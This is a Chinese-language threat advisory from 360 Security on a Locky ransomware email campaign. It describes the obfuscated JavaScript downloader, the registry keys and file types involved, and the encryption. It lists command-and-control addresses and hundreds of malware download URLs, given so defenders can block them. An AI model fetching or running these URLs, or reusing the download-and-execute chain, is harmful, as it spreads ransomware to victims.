 
 
自2月以来,360威胁情报中心监测到一大波勒索软件潮,国内单位组织陆续开始受到的冲击,公司对外的邮箱收到大量如下携带恶意附件的邮件。
  
 
邮件内容大致如下:
  
 
员工如不小心打开恶意附件,恶意软件会对外连接服务器下载组件,加密系统上的重要文件,要求用户付费解密。
邮件附件为只有两个JS脚本的压缩包:
  
 
  
 
JS经过混淆,通过分析得知,受害者双击执行JS后创建MSXML2.XMLHTTP对象下载http://vaseline-amar-ujala.in/euwiyr4hdc可执行文件,并通过WScript.Shell对象的run方法启动Locky主进程:
  
 
下载的exe经过大量的混淆处理:
  
 
进程启动后将机器ID写入HKEY_CURRENT_USER/Software/Locky/id,并将用到的加密公钥写入HKEY_CURRENT_USER/Software/Locky/pubkey:
  
 
  
 
随后木马开始遍历目录寻找.xls、.ppt、.doc、.wb2、.jpg、.wav等文件格式,使用RSA加密为Id+哈希.locky文件,并在存在文档得目录下写入恢复指导文档:
  
 
  
 
完成加密后将HKEY_CURRENT_USER/Software/Locky/completed设置为1,并通过加密的数据告知服务器:
  
 
如下是部分通信地址列表:
| http://78.40.108.39/main.php | 
| http://51.255.107.8/main.php | 
| http://51.255.107.10/main.php | 
| http://51.254.181.122/main.php | 
| http://195.64.154.114/main.php | 
| http://188.127.231.116/main.php | 
| http://149.202.109.205/main.php | 
最后将桌面设置为恢复指导图,并弹出恢复指导文档,等待受害者交付赎金:
  
 
根据360威胁情报中心的数据,自3月以来确认中招的用户超过万人,淘宝上甚至已经出现协助代付款解密的服务。在此建议用户不要随意点击来源不明的邮件,目前360安全卫士已对此勒索软件做持续的查杀。
攻击者用于存放恶意代码的Downloader服务器大都是被攻陷的合法站点,以下是部分列表,请在边界设备上予以阻断。
http://1.casino-engine.ru/engine/core/76tr5rguinml.exe
http://1.casino-engine.ru/modules/images/87yhb54cdfy.exe
http://111.208.4.230:82/1Q2W3E4R5T6Y7U8I9O0P1Z2X3C4V5B/saigonnew.com.vn/system/logs/76tr5rguinml.exe
http://120.52.72.52/biosoftbelgium.com/c3pr90ntcsf0/system/logs/76tr5rguinml.exe
http://120.52.72.57/thuanhshop.com/c3pr90ntcsf0/system/logs/4trf3g45.exe
http://178.33.176.229/ber.exe
http://2.casino-engine.ru/img/multigaminator/4trf3g45.exe
http://50.28.211.199/hdd0/89o8i76u5y4
http://51457642.de.strato-hosting.eu/980k7j6h5
http://academiasuperior.net/wp-includes/rest-api/5h45hg4b
http://accessinvestment.net/4/0vexw3s5
http://aexpress.co/system/logs/086tg7
http://aimsande.com/87yg756f5.exe
http://aksci.net/system/logs/98yhb764d.exe
http://alexkote.ru/wp-content/plugins/87tg7v645c.exe
http://alumaxgroup.in/87yg756f5.exe
http://anro.kiev.ua/vqmod/vqcache/4trf3g45.exe
http://aqarhits.com/system/logs/87tg7v645c.exe
http://ari-ev.com/system/logs/765uy453gt5
http://aroham.com/87yg756f5.exe
http://art-studia-sharm.com.ua/libraries/simplepie/765g473bf34
http://art-wiz.ru/wp-includes/SimplePie/7ygvtyvb7niim.exe
http://astralia.ro/08o76g445g
http://azshop24.com.vn/system/logs/87tg7v645c.exe
http://baiya.org/image/templates/7ygvtyvb7niim.exe
http://behrozan.ir/system/logs/7t6f65g.exe
http://beltshoesnmore.com/system/logs/87yhb54cdfy.exe
http://besttec-cg.com/89ok8jhg
http://bindulin.by/system/logs/7ygvtyvb7niim.exe
http://biomir.ajanslive.com/system/logs/78tgh76.exe
http://biosoftbelgium.com/system/logs/76tr5rguinml.exe
http://browardcountystore.com/system/cache/223
http://buyfuntees.com/system/logs/7t6f65g.exe
http://c001456.aaa.ididp.com/system/logs/87yg756f5.exe
http://casewerkz.demowebsite.net/system/logs/87yhb54cdfy.exe
http://cazasports.com/system/logs/uy78hn654e.exe
http://ccac3323.com.sapo.pt/0y7bf3r
http://cherryuk.co.uk/system/logs/uy78hn654e.exe
http://chinhuanoithat.com/system/logs/uy78hn654e.exe
http://clubxtoys.com/system/logs/lkj87h.exe
http://cocowashi.com/system/logs/76tr5rguinml.exe
http://creditwallet.net/87yg756f5.exe
http://croqqer.org/wp-content/uploads/5h45hg4b
http://cuagonhaviet.com.vn/system/logs/lkj87h.exe
http://cyberbuh.pp.ua/97kh65gh5
http://demo.essarinfotech.net/87yg756f5.exe
http://demo.rublemag.ru/system/logs/87yhb54cdfy.exe
http://demo2.master-pro.biz/modules/payments/76tr5rguinml.exe
http://demo2.master-pro.biz/plugins/markitup/4trf3g45.exe
http://dgcustomgraphics.com/system/logs/98yhb764d.exe
http://dolcevita-ykt.ru/system/logs/uy78hn654e.exe
http://dommediciny.ru/system/logs/76h5gf43wg54
http://donutes.33499.info/system/logs/87yhb54cdfy.exe
http://dropshipaanbod.nl/system/logs/uy78hn654e.exe
http://dsignshop.com.au/system/logs/87tg7v645c.exe
http://effone.com/js/playstation4.exe
http://eiadmeodeda.securalive.ca/8fjvimkel1/c987ah8j9ei1.php
http://e-journal.respati.ac.id/8y74hfb
http://electime.com/wp-content/themes/765g473bf34
http://elogistic.ir/wp-admin/network/87hg8n54
http://emotos.ru/admin/model/87yhb54cdfy.exe
http://escortbayan.xelionphonesystem.com/wp-content/plugins/hello123/89h8btyfde445.exe
http://estudiomatera.com.ar/763fdvf
http://fashion-girl.od.ua/catalog/controller/87hg8n54
http://fb7707vd.bget.ru/admin/language/4trf3g45.exe
http://fibrefamily.ru/system/logs/87tg7v645c.exe
http://fkaouane.free.fr/67uh54gb4
http://flaxxup.com/87yg756f5.exe
http://for-sale.pk/system/logs/87yhb54cdfy.exe
http://fortyseven.com.ar/system/logs/7t6f65g.exe
http://g200.qdesign.vn/system/logs/87yhb54cdfy.exe
http://galit-law.co.il/32tguynjk
http://gargsons.com/87yg756f5.exe
http://giveitallhereqq.com/69.exe
http://giveitallhereqq.com/80.exe
http://giveitalltheresqq.com/69.exe
http://giveitalltheresqq.com/80.exe
http://gladilki.bohush.ru/system/library/a.exe
http://glslindia.com/87yg756f5.exe
http://gwentpressurewashers.com/system/logs/7ygvtyvb7niim.exe
http://heenaz.in/system/logs/98yhb764d.exe
http://hellomississmithqq.com/69.exe
http://hellomississmithqq.com/80.exe
http://het-havenhuis.nl/099oj6hg
http://hipnotixx.com/27h8n
http://hitronic.org/system/logs/76tr5rguinml.exe
http://hkhc-shop.lms.hk/system/logs/87yg7g
http://howisittomorrowff.com/69.exe
http://hppl.net/87yg756f5.exe
http://ihsanind.com/system/logs/87jhg44g5
http://imgointoeatnowcc.com/69.exe
http://imgointoeatnowcc.com/80.exe
http://imgointoeatnowcc.com/80.exe
http://imperiovintage.com.br/system/logs/76tr5rguinml.exe
http://indianexporthouse.eu/system/logs/uy78hn654e.exe
http://iperfume.co.il/system/logs/4trf3g45.exe
http://ipovareshka.ru/system/logs/76tr5rguinml.exe
http://italco.com.ua/system/logs/98yhb764d.exe
http://iwear.md/system/logs/7t6f65g.exe
http://izzy-cars.nl/9uj8n76b5.exe
http://jewellery.jagodesh.com/system/logs/iu8y7g6b
http://jldoptics.com/system/logs/87tg7v645c.exe
http://joecockerhereqq.com/69.exe
http://joecockerhereqq.com/80.exe
http://jorgecodas.com/76t2gr345
http://kiddyshop.kiev.ua/image/data/87tg7v645c.exe
http://kidtuning.ro/7r5fyf6
http://kievelectric.kiev.ua/art/media/87tg7v645c.exe
http://klariss.cz/87yg756f5.exe
http://kokoko.himegimi.jp/54g4
http://komplektik.com/system/logs/76tr5rguinml.exe
http://lahmar.choukri.perso.neuf.fr/78hg4wg
http://lampusorotmurah.com/system/logs/78tgh76.exe
http://lapdatcamerachatluongcao.com/system/logs/uy78hn654e.exe
http://leaderjewelleryco.com/admin/controller/87yhb54cdfy.exe
http://lhs-mhs.org/9uj8n76b5.exe
http://lightsroom.ru/system/logs/87tg7v645c.exe
http://liquor1.slvtechnologies.com/system/logs/7ygvtyvb7niim.exe
http://livewireradio.net/wp-admin/js/765g473bf34
http://magic-beauty.com.ua/system/logs/98yhb764d.exe
http://mail-dedmoroz.com.ua/adminka/templ/7ygvtyvb7niim.exe
http://mansolution.in.th/system/logs/7ygvtyvb7niim.exe
http://massage-himmel.de/978yhen2
http://maxbeauty.dp.ua/administrator/manifests/765g473bf34
http://maybridalsash.com/system/cache/111
http://mercadohiper.com.br/system/logs/uy78hn654e.exe
http://ministerepuissancejesus.com/o097jhg4g5
http://mobile-house.be/system/logs/98yhb764d.exe
http://myonlinedeals.pk/system/logs/43d5f67n8
http://myphampro.com/system/logs/87yhb54cdfy.exe
http://nagrobkipelplin.conceptreklamy.pl/modules/mod_wrapper/4trf3g45.exe
http://ncrweb.in/system/logs/7t6f65g.exe
http://newleaf.org.in/87yg756f5.exe
http://nguoitieudungthongthai.com/system/logs/987i6u5y4t
http://nhinh.com/system/logs/uy78hn654e.exe
http://nobilitas.cz/0954t4h45
http://nro.gov.sd/23r35y44y5
http://nypizza.ru/system/logs/7ygvtyvb7niim.exe
http://ohammam.fr/system/logs/23f3rf33.exe
http://ohbelleza.linkium.mx/system/logs/87yhb54cdfy.exe
http://ohellograndpaqq.com/69.exe
http://ohellograndpaqq.com/80.exe
http://ohelloguyff.com/70.exe
http://ohelloguyqq.com/70.exe
http://ohelloguyzzqq.com/85.exe
http://onsancompany.com/system/logs/uy78hn654e.exe
http://ozono.org.es/k7j6h5gf
http://pacificgiftcards.com/3/67t54cetvy
http://parturiencies3f9.besaba.com/76t2gr345
http://perfumy_alice.republika.pl/08h867g5
http://peterdickem.com/87745g
http://phatfx.net/98h8n23r23
http://phongsachviettech.com/system/logs/98yg7b
http://planetarchery.com.au/system/logs/q32r45g54
http://printisimo.ru/image/cache/7ygvtyvb7niim.exe
http://ptunited.net/system/logs/87tg7v645c.exe
http://pugmahons.com/~pugmahons/56er5f6g7b
http://realvacantcolony.tradersnetwork.co/97adguwod/08h13rfi982y.php
http://regentsanctionbisexual.isupplementscanada.com/97adguwod/08h13rfi982y.php
http://rem.az/system/logs/lkj87h.exe
http://risetravel.net/wp-includes/theme-compat/765g473bf34
http://rmdszms.ro/2/87yv5cds
http://saabvolvo.com.ua/system/logs/7ygvtyvb7niim.exe
http://saachi.co/system/logs/43ghy8n
http://sabriduman.com/wp-content/plugins/hello123/89h8btyfde445.exe
http://saigonnew.com.vn/system/logs/76tr5rguinml.exe
http://sales-teleselling.eu.org/wp-includes/fonts/5h45hg4b
http://scorpyofilms.com/67j5h5h4
http://scs-smesi.ru/published/PD/87tg7v645c.exe
http://shapes.com.pk/system/logs/87tg7v645c.exe
http://shoescorner.gr/system/logs/76tr5rguinml.exe
http://shofukai.web.fc2.com/23rt54y56
http://shop.celiodent.com/system/cache/111
http://shopphpmvc.e-groups.vn/system/logs/lkj87h.exe
http://shopthoitrangphukien.com/system/logs/7ygvtyvb7niim.exe
http://sigmahardware.com.my/system/logs/7ygvtyvb7niim.exe
http://silvermarket.gr/system/logs/78tgh76.exe
http://sitemar.ro/5/92buyv5
http://sm1.by/vqmod/xml/76tr5rguinml.exe
http://smeja.de/i876jh556h
http://smokediscount.de/786u5h
http://snosto.com/wp-admin/includes/i75rg456
http://softcrk.com/system/logs/4trf3g45.exe
http://softworksbd.com/73tgbf334
http://solucionesdubai.com.ve/system/logs/uy78hn654e.exe
http://sribinayakelectricals.com/system/logs/78tgh76.exe
http://srv35613.ht-test.ru/storage/plugins/76tr5rguinml.exe
http://stalu.sk/43dfg7hy
http://stepsaweb.com/system/logs/uy78hn654e.exe
http://stopmeagency.free.fr/9uj8n76b5.exe
http://storageinbath.co.uk/78jh5h
http://store.suhaskhamkar.in/system/logs/78tgh76.exe
http://sub4.gustoitalia.ru/system/logs/87tg7v645c.exe
http://superiorelectricmotors.com/wp-content/plugins/hello123/89h8btyfde445.exe
http://supply-division.dk/system/logs/76tr5rguinml.exe
http://surfcash.7u.cz/0o9k7jh55
http://surgitek.co.uk/system/logs/98yt
http://surprise.co.in/system/logs/87tg7v645c.exe
http://svetluchok.com.ua/admin/images/7ygvtyvb7niim.exe
http://szkoleniasluzb.pl/67j5hg
http://tcpos.com.vn/system/logs/56y4g45gh45h
http://tekstil-world.ru/vqmod/install/7ygvtyvb7niim.exe
http://test.sharmx.com.ua/sdideep/87hg8n54
http://texfibre.eu/system/logs/87tg7v645c.exe
http://thaihost.biz/bestylethai.com/43t3gh4
http://theskcreativearts.com/45tg
http://thewhitemug.co.uk/system/logs/4trf3g45.exe
http://thietbianninhngocphuoc.com/system/logs/98yhb764d.exe
http://thietbicokhi.com.vn/system/logs/7ygvtyvb7niim.exe
http://thisisitsqq.com/69.exe
http://thisisitsqq.com/80.exe
http://thuanhshop.com/system/logs/4trf3g45.exe
http://tianshilive.ru/vqmod/xml/87yhb54cdfy.exe
http://tomkinshop.net/system/logs/87yhb54cdfy.exe
http://torgtehnik.ru/system/cache/.../1.exe
http://tracks4africa.li/43f
http://tradesolutions.me.uk/8i76
http://tramps-ike.gr/8i67uy4g
http://tratancuongthainguyen.com/v4v5g45hg.exe
http://trieugiatrang.net/image/cache/87yhb54cdfy.exe
http://trimchic.co.uk/system/logs/lkj87h.exe
http://tuning.com.mx/v4v5g45hg.exe
http://u1847.netangels.ru/system/smsgate/7ygvtyvb7niim.exe
http://ubermensch.altervista.org/system/logs/87yhb54cdfy.exe
http://vaanifashion.com/system/logs/uy78hn654e.exe
http://vacationinbath.co.uk/v4v5g45hg.exe
http://vacationinbath.com/v4v5g45hg.exe
http://valerieannefashions.co.uk/v4v5g45hg.exe
http://vartashakti.com/v4v5g45hg.exe
http://vfwuc.eu.org/wp-content/uploads/5h45hg4b
http://vgp3.vitebsk.by/6/98yh8bb
http://vikasartsjodhpur.com/v4v5g45hg.exe
http://vip-creme.de/v4v5g45hg.exe
http://vip-shape.de/v4v5g45hg.exe
http://vital4age.de/v4v5g45hg.exe
http://vital4age.eu/v4v5g45hg.exe
http://washitallawayff.com/69.exe
http://washitallawayff.com/80.exe
http://webmail.p55.be/v4v5g45hg.exe
http://wechselkur.de/v4v5g45hg.exe
http://whatskv.com/v4v5g45hg.exe
http://winjoytechnologies.com/v4v5g45hg.exe
http://wireless-sync.com/system/cache/111
http://workplace-communication.eu.org/wp-includes/pomo/5h45hg4b
http://www.aebnworld.com/98o7kj56h
http://www.aggiesaquariums.com.au/wp-includes/y78hiuok
http://www.almraah.com/wp-content/uploads/y78hiuok
http://www.avdanrenault.com/system/logs/4trf3g45.exe
http://www.dentiera-rotta.it/files/Fedex/fedex.exe
http://www.ekowen.sk/09y8j
http://www.findtube.gr/templates/atomic/js/111.exe
http://www.fotoleonia.it/files/sample.exe
http://www.freeadultcontent.us/98o7kj56h
http://www.freepussyshow.com/9oi654gh3
http://www.gruposdemediosrrr.com/9oi654gh3
http://www.gw-fs.co.uk/873y4g7bf3
http://www.houseman.cz/files/10003c.exe
http://www.istruiscus.it/7643grb
http://www.kidshealingcrohnsandcolitis.com/8y7hybigv
http://www.kidshealingcrohnsandcolitis.org/8y7hybigv
http://www.koinerestaurant.com/parallax/piatti/promt.exe
http://www.livegirlshow.com/8i5ju4g34
http://www.liveshowgirl.com/8i5ju4g34
http://www.momstav.com/087hg67
http://www.myxxxlinks.com/4ggh45yh45
http://www.myxxxlinks.com:20480/4ggh45yh45
http://www.nenitasthumbs.com/4ggh45yh45
http://www.nevjegydesign.hu/0k6j6n4h4
http://www.nevjegyportal.hu/0k6j6n4h4
http://www.notebooktable.ru/system/logs/7ygvtyvb7niim.exe
http://www.promumedical.com/system/logs/87tg7v645c.exe
http://www.silko.ir/k8j5h
http://www.souqaqonline.com/system/logs/87tg7v645c.exe
http://www.tech-filter.ru/system/logs/78tgh76.exe
http://www.toolsavenue.com/system/cache/87yhb54cdfy.exe
http://www.trasachthainguyen.com/0l9k7j6
http://www.tuttiesauriti.org/wp-content/plugins/hello123/89h8btyfde445.exe
http://www.vtipnetriko.cz/9oi86j5hg4
http://xn--80ahetikodul.xn--p1ai/system/logs/4trf3g45.exe
http://xn--b1afonddk2l.xn--p1ai/system/logs/7t6f65g.exe
http://yander.by/system/logs/uy78hn654e.exe
http://zarabotoknasayte.zz.mu/7/sh87hg5v4
本文由 360安全播报 原创发布,如需转载请注明来源及本文地址。本文地址:http://bobao.360.cn/learning/detail/2804.html